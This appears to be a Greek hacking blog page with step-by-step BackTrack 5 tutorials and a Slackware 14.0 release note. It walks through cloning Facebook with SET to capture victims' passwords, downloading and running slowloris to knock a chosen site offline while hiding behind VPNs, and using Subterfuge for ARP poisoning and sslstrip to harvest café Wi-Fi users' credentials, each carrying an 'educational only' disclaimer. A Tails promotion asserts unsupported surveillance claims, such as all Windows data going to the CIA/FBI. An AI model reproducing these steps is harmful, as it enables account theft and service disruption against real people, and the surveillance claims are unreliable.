
Β) Σε αυτό το στάδιο χρησιμοποιούμε το Credential Harvester Attack.

Terminal: cd pentest/exploits/set ↵
./set ↵

*Αυτό μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη διαδρομή Bt5 --> explotation tools --> social engineering tools --> set

Στη συνέχεια ακολουθούμε:
Terminal: 2 ↵
3 ↵
1 ↵
4 ↵
Στο σημείο αυτό θα μας βγάλει ''Press {return} to continue'' πατάμε enter και μας βγάζει τρεις σειρές με μπλε γράμματα. Όταν το θύμα ανοίξει το link που του στείλαμε τότε ανοίγει η σελίδα του κλώνου του facebook που δημιουργήσαμε και αυτός όταν πληκτρολογίσει το username – password τότε κοιτάμε στο terminal και μας δείχνει τι πληκτρολόγισε. Έτσι αποκτάμε πρόσβαση στο λογαριασμό του.


ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Τails... Διανομή αποκλειστικά για ανωνυμία και ασφάλεια

Αναφορές στο θέμα Ανωνυμίας και Ασφάλειας δεν θα σταματήσουμε ποτέ να κάνουμε. Όχι τουλάχιστον μεχρι αυτά να γίνουν δεδομένα και δικαίωμα του κάθε χρήστη. Και αυτή τη στιγμή κακά τα ψέματα η ανωνυμία και η ασφάλεια βάλλονται. Οι κυβερνήσεις, αυτοί οι μηχανισμοί βίας, μέσω των υπηρεσιών ασφαλείας κάνουν τα πάντα για να μην έχουν κανένα δικαίωμα στην ανωνυμία οι άνθρωποι.
Θέλεις με δημόσιες κάμερες, οι οποίες στο πρόσχημα της τρομοκρατίας και άλλων τέτοιων χρησιμοποιούνται για άλλους λόγους, θελεις με επιβολή νόμων που επιβάλει την χρήση πιστωτικής κάρτας, με συμβούλια και ελέγχους στην δημοσιογραφία, με δυνάμεις καταστολής και βέβαια με κάθε τρόπο επιβολή αυτών και στο διαδίκτυο.
Βλέπετε το διαδίκτυο είναι το τελευταίο μέρος πλέον όπου καποιος μπορεί ακόμα να μιλήσει ελεύθερα και να ενημερώνει τους ανθρώπους. Και αυτό ενοχλεί τις κυβερνήσεις και το ίδιο το σύστημα, καθώς δείχνει πόσο σάπια και ψεύτικα είναι.
Πρέπει να γίνει κατανοητό στον καθένα πως το δικαίωμα στην ανωνυμία είναι δικαίωμα. Αυτό είναι ανομία και όχι παρανομία, όπως προσπαθούν να πείσουν οι κονδυλοφόροι της “ενημέρωσης” και οι κυβερνητικοί εκπρόσωποι.
Κατανοώ πως ο λεγόμενος καθημερινός χρήστης είναι δύσκολο να ξεχωρίσει κάποια βασικά πράγματα και πως πιστεύει ότι όλα στο διαδίκτυο είναι ρόδινα και ωραία.
Όμως η αλήθεια δεν είναι καθολου έτσι. Οι δυνάμεις καταστολής ψάχνουν και βρίσκουν εξιλαστήρια θύματα, παρουσιάζοντας τα ως τρομοκράτες και ως διασαλευτές της (λεγόμενης) δημόσιας ασφάλειας.
Στο παρελθόν, έχουμε αναφέρει πολλά για το δικαίωμα στην ανωνυμία και την ιδιωτικοτητα. Έχουμε μάλιστα δώσει και ένα… επικό άρθρο με όλα όσα πρέπει να ξέρει και να κάνει καποιος ώστε να έχει αυτά κατά την περιήγηση του στο διαδίκτυο.
Πρέπει πρώτα απ’ όλα να γίνει κατανοητό πως η άρση της ανωνυμίας ξεκινάει από την στιγμή που συνδεόσαστε στο διαδίκτυο και ανοίγετε το λειτουργικό σας σύστημα. Είναι γεγονός πως η Microsoft και τα Windows δεν θέλουν την ανωνυμία και πως όλα μα όλα τα δεδομένα των ανθρώπων που χρησιμοποιούν αυτό το λειτουργικό σύστημα, ταξιδεύουν σε servers της εταιρείας, της CIA/FBI και ανά πάσα στιγμή είναι στη διάθεση οποίας κρατικής υπηρεσίας τα θελήσει.
Ακόμα και οι υποτιθέμενες ιδιωτικές σας συνομιλίες μέσω του Skype καταγράφονται, αποθηκεύονται και ανά πάσα στιγμή μπορούν να χρησιμοποιηθούν εναντίον σας.
Τι και αν δεν είπατε τίποτα κακό, τι και αν έχετε δίκιο, αυτά δεν ενδιαφέρουν καθολου τις δυνάμεις καταστολής. Ακριβώς όπως γίνεται και στην καθημερινότητα. Ρίξτε μια μάτια γύρω σας και δείτε τα υπεροπτικά πρόσωπα των ένστολων που έχουν αυξηθεί ανησυχητικά, οι οποίοι αντιμετωπίζουν τον κάθε άνθρωπο ως εγκληματία, ενώ αυτοί είναι οι… “αθώες περιστερές” και τα πιστά σκυλιά του συστήματος.
Έτσι ακριβώς γίνεται και στο διαδίκτυο και ας μην το μαθαίνετε ποτέ. Οι κυβερνήσεις, μέσω των υπηρεσιών ασφαλείας, θέλουν, απαιτούν τα δεδομένα των ανθρώπων, ώστε να τους… εξηγήσουν τι σημαίνει “δικαιοσύνη”.
Και ας μη πει καποιος ότι ξεφεύγω, επειδή το ίδιο συμβαίνει και στο διαδίκτυο. Υπάρχουν μάτια που παρακολουθούν τα πάντα και εταιρείες (οι λεγόμενοι κολοσσοί) οι οποίοι πρόθυμα και χωρίς δεύτερη κουβέντα δίνουν συνήθως τα δεδομένα και τους ανθρώπους στα νύχια των δυνάμεων καταστολής.
Φυσικά το ίδιο θα κάνει και ο provider σας. Αυτή η εταιρεία δηλαδη η οποία σας παρέχει την πρόσβαση σε ένα κοινωνικό αγαθό όπως το διαδίκτυο, χρεώνοντας σας παράλογα (40 ευρώ τον μήνα ο ΟΤΕ, για παράδειγμα και βέβαια, ακόμα και αν οι κυβερνήσεις “ξεχάσαν”, εμείς δεν ξεχνάμε το βρωμερό παιχνίδι της Vofafone και τις υποκλοπές).
Αν κάποιοι έχετε στραβώσει με τα παραπάνω και τα θεωρείτε υπερβολές, αλλάξτε θέμα η ακόμα καλύτερα αλλάξτε σελίδα. Ένα κλικ μακρυά σας είναι το Facebook και οι εθνικοπατριωτικές σελιδες.
Και έχοντας κάνει ξεκάθαρα κάποια πράγματα, ας περάσουμε και στην ουσία για την ανωνυμία και ιδωτικοτητα στο διαδίκτυο.
Δεν χρειαζεται να έχετε γνώσεις ιδιαίτερες ώστε να επιτύχετε κάτι τέτοιο. Υπάρχουν κάμποσες Linux διανομές που έρχονται έτοιμες για κάτι τέτοιο με τα ανάλογα εργαλεία.

Talis

Μια όμως διανομή του είδους, πιο προσιτή και με όλα τα αναγκαία για ασφάλεια και ανωνυμία είναι το Tails που προέρχεται από τα ακρωνύμια των λέξεων: The Amnesic Incognito Live System.
Η διανομή αυτή δεν απαιτεί καν εγκατάσταση, μα μπορεί να τρέξει live από κάποιο δισκάκι η usb stck.
Παρέχει μια ολοκληρωμένη σειρά ευκολοχρηστων εργαλείων τα οποία προσφέρουν:

Ανώνυμη και ασφαλή περιήγηση στο διαδίκτυο μη αρκούμενη στα όσα κάνει το Tor μα προχωρώντας περισσότερο εις βάθος αρχίζοντας από το ίδιο το σύστημα σας.
Έτσι θα βρείτε εργαλεία για ασφαλή κρυπτογράφηση μα και άμεση καταστροφή των δεδομένων σας σε περίπτωση ανάγκης, ώστε να μην μπορεί να τα ανακτήσει καποιος άλλος.
Αυτό σημαίνει πως πίσω σας δεν αφήνετε ίχνη η πως αυτά είναι πολύ δύσκολο ως σχεδον αδύνατο να ανακτηθούν καθώς απαιτούν μεγάλο κόστος και άπειρο χρόνο.
Η διανομή αυτή, παλιότερα ήταν γνωστή και ως Incognito Linux, βασίζεται στο Debian, είναι μικρή σε μέγεθος και με ένα περιβάλλον προσιτό στον οιονδήποτε.
Το μόνο που έχετε να κάνετε, είναι να την κατεβάσετε (ISO) και να την “κάψετε” σε κάποιο δισκάκι η ακόμα και σε κάποιο usb stick (με το Unetbootin).
Στη συνέχεια εκκινήστε τον υπολογιστή σας από αυτό και έτσι θα μπείτε στο περιβάλλον του Tails, το οποίο σε καμία περίπτωση δεν θα πειράξει η θα έχει κάποια επαφή με το υπάρχον η υπάρχοντα εγκατεστημένα λειτουργικά σας συστήματα.

Το να χρησιμοποιείτε το Tails η όποια άλλη διανομή και εργαλείο ανωνυμίας και να κάνετε login στο Facebook, το Gmail σας και άλλες υπηρεσιες, ΔΕΝ έχει κανένα απολύτως νόημα, καθώς στη πράξη καταργείτε την ανωνυμία σας

Κυριακή 3 Μαρτίου 2013

DoS επίθεση με το BackTrack 5 R3 | Slowloris.pl

Ένα είδος επίθεσης σε κάποιο server είναι η επίθεση DoS (Denial of Service). Για να πραγματοποιήσουμε αυτό υπάρχουν αρκετοί τρόποι (LOIC, HOIC, slowloris κτλ...) Στο παρακάτω απόσπασμα ακολουθεί ένα σεμινάριο DoS επίθεσης με τη χρήση του εργαλείου slowloris στο BackTrack5 R3.
Το πρώτο πράγμα που πρέπει να κάνουμε για πραγματοποιήσουμε αυτό το είδος επίθεσης σε ένα server είναι να βρούμε από το διαδίκτυο το αρχείο slowloris.pl. Το αρχείο αυτό είναι ένας κώδικας και μπορούμε να τον κατεβάσουμε από το link που ακολουθεί:

http://ha.ckers.org/slowloris/slowloris.pl

Αφού ανοίξουμε το link πατάμε επιλογή όλων και δεξί κλικ αντιγραφή. Στη συνέχεια ανοίγουμε ένα κενό έγγραφο κειμένου (gedit), πατάμε επικόλληση και αποθηκεύουμε το έγγραφο στην επιφάνεια εργασίας του BackTrack 5 R3 με το όνομα ''slowloris.pl''.
Αφού κάνουμε αυτό, επόμενο βήμα είναι να βρούμε το στόχο-site που θέλουμε να χτυπήσουμε.
Μετά από αυτό ανοίγουμε ένα terminal και πληκτρολογούμε:

Code:
cd Desktop/ ↵
./slowloris.pl – dns (ip or www.site.com)

Όταν κάνουμε αυτό θα δούμε στην οθόνη να τρέχουν κάποια γράμματα.

Για παράδειγμα
Building Pockets
Building Pockets
Building Pockets
Building Pockets
Building Pockets...
Αυτό σημαίνει ότι η επίθεση έχει αρχίσει...

Τώρα αν προσπαθήσουμε να ανοίξουμε τη σελίδα που χτυπάμε πολύ απλά θα μας δείχνει σφάλμα σύνδεσης στη σελίδα. Όταν σταματήσουμε την επίθεση και ανοίξουμε τη σελίδα τότε θα μπορέσουμε να εισελθουμε σε αυτήν ξανά. Να θυμάστε όσο περισσότερα άτομα χτυπάνε μαζί μια σελίδα τόσο καλύτερο θα είναι το αποτέλεσμα. Μερικοί server όμως που έχουν load balancer πολύ πιθανό η επίθεση DoS να μην πιάσει. Τέλος το slowloris αποτελεί ένα ισχυρό εργαλείο για DoS επιθέσεις όπως επίσης να μη ξεχνάμε πάντα να χρησιμοποιούμε τα κατάλληλα προγράμματα για διαφύλαξη της ανωνυμίας μας. (VPN, proxy, κτλ).

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Παρασκευή 1 Μαρτίου 2013

Backtrack 5 R3 Tutorial - Αυτοματοποιημένη διαδικασία απόκτησης κωδικών πρόσβασης με Subterfuge


Σε αυτό το tutorial θα δούμε πως να αποκτήσουμε κωδικούς πρόσβασης με διαδικασία ΜΙΤΜ (Man in the Middle) χρησιμοποιώντας το Subterfuge.

1) Πρώτα απ'όλα κατεβάζουμε το subterfuge από εδώ
2) Ανοίγουμε ένα τερματικό και πηγαίνουμε στο φάκελο που κατεβάσαμε το αρχείο μας πληκτρολογόντας cd Downloads και στη συνέχεια ls. Η διαδικασία φαίνεται παρακάτω στην εικόνα.
3) Αποσυμπιέζουμε το αρχείο: tar -zxvf (όνομα αρχείου)


4) Στη συνέχεια γράφουμε: cd subterfuge
5) Μετά γράφουμε την παρακάτω εντολή έτσι ώστε να μας ανοίξει το αρχείο ρυθμίσεων της εφαρμογής και να δούμε ποια είναι η εντολή εγκατάστασης του: nano README




6) Αφού κάναμε έλεγχο πληκτρολογούμε: python setup.py install

7) Για να κάνουμε εγκατάσταση της εφαρμογής σε γραφικό περιβάλλον: ./setup.py



8) Επιλέγουμε πλήρης εγκατάσταση...




9) Για να εκκινήσουμε γράφουμε στο τερματικό: subterfuge


10) Ανοίγουμε τον browser και εισάγουμε το link που φαίνεται http://127.0.0.1:80





11) Στη συνέχεια μας ανοίγει ένα παράθυρο με τις επιλογές της εφαρμογής. Παρατηρούμε ότι υπάρχουν πολλές επιλογές για ένα πλήρες penetration test.



12) Στην πάνω δεξιά γωνία της οθόνης γράφει "Start". Κάνουμε κλίκ και στη συνέχεια επιλέγουμε "ΟΚ" στο μήνυμα που εμφανίζεται





13) Ας ρίξουμε μια ματιά στο τερματικό. Όπως βλέπουμε όλα γίνονται με αυτόματο τρόπο και συγκεκριμένα το arp poisoning, ip forwarding, credential harvester και το sslstrip.


14) Τέλος ρίχνω μια ματιά στον browser και παρατηρώ ότι ανάλογα με την κίνηση του δικτύου και ανάλογα σε ποια σελίδα μπαίνουν για παράδειγμα οι χρήστες του ασύρματου δικτύου σε μια καφετέρια με ασύρματο δωρεάν ιντερνετ παίρνω τους κωδικούς πρόσβασης τους όταν μπαίνουν στους λογαριασμούς τους.



ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Slackware Linux 14.0


Μετά από ανάπτυξη πολλών, σχετικά, μηνών και κυκλοφορίας πέντε (5) release candidates (RC), το Slackware Linux Project κυκλοφόρησε μια ακόμα σταθερή έκδοση της διανομής. Αναφερόμαστε βέβαια στο Slackware Linux 14.0. Ο χρόνος ο οποίος χρειάστηκε για την ανάπτυξη και δοκιμή (testing) αυτής της έκδοσης, είναι δεκαεπτά (17) μήνες και είναι ο μεγαλύτερος έως τώρα, στην δεκαεννιάχρονη (19) πορεία αυτής της ιστορικής διανομής με τις τριαντατρείς (33) σταθερές εκδόσεις.


Συνοπτικά μερικά από τα νέα χαρακτηριστικά αυτής της έκδοσης.

  • Πέρασε πλέον σε πυρήνα Linux (kernel-*) της σειράς 3.x, συγκεκριμένα τον 3.2.29, ο οποίος έχει υποστήριξη μακράς διάρκειας (long-term support) από το kernel.org
  • Η συλλογή GNU compilers (gcc) στην έκδοση 4.7.1
  • Τα εκτελέσιμα μπορούν πλέον να «συνδεθούν» με την GNU C Library (glibc) έκδοσης 2.15
  • Διατίθεται το νέο σύστημα X11R7.7, με τον X.Org Server (xorg-server) 1.12.3
  • Το γραφικό περιβάλλον KDE (kde/*) 4.8.5
  • Το γραφικό περιβάλλον XFCE (xfce/*) 4.10 (στο οποίο ο Thunar μπορεί και από/προσαρτά partitions)
  • Για πρώτη φορά διατίθεται ο γνωστός NetworkManager (NetworkManager) του Gnome Project, για προαιρετική, απλούστερη(!) και «γραφική» ρύθμιση των δικτύων!
  • Ο διάσημος εναλλακτικός compiler Clang/LLVM/(llvm) (default στο FreeBSD 10 dev)
  • Στο extra διατίθεται SlackBuild για δημιουργία πακέτου του Google Chrome
  • Στο testing, υπάρχουν έτοιμα αρχεία config’s για όποιους ενδιαφέρονται (γκουχ-γκουχ) να δοκιμάσουν μια μεταγλώττιση/εγκατάσταση πυρήνων Linux, των εκδόσεων 3.4.11, 3.5.4 και 3.6-rc4
  • Διατίθεται για τις αρχιτεκτονικές x86 (32-bit), x86_64 (64-bit) και ARM
Παρόλα αυτά, ο BDFL της διανομής Patrick J. Volkerding, καθησυχάζει τους χρήστες του λέγοντας πως όποιος έχει χρησιμοποιήσει ξανά την διανομή μπορεί να νοιώθει _ακόμα_ το σύστημά του σαν το σπίτι του..!!

Επίσης, αναφέρει πως στο δικτυακό τόπο SlackBuilds.org, διατίθενται όλων των ειδών build scripts για επιπρόσθετο λογισμικό. Και για όποιον χρειάζεται βοήθεια να επισκεφτεί την νέα ιστοσελίδα τεκμηρίωσης, το Slackware Documentation Project.

Σχετικοί σύνδεσμοι

Επίσημη ιστοσελίδα της διανομής: http://slackware.com/ 

Επίσημη ιστοσελίδα της τεκμηρίωσης: http://docs.slackware.com/

Αποκτήστε τη διανομή: http://slackware.com/getslack/ 

Για την ARM αρχιτεκτονική: http://www.armedslack.org/ 

Επιπρόσθετο λογισμικό: http://slackbuilds.org/

Πηγή: osarena.net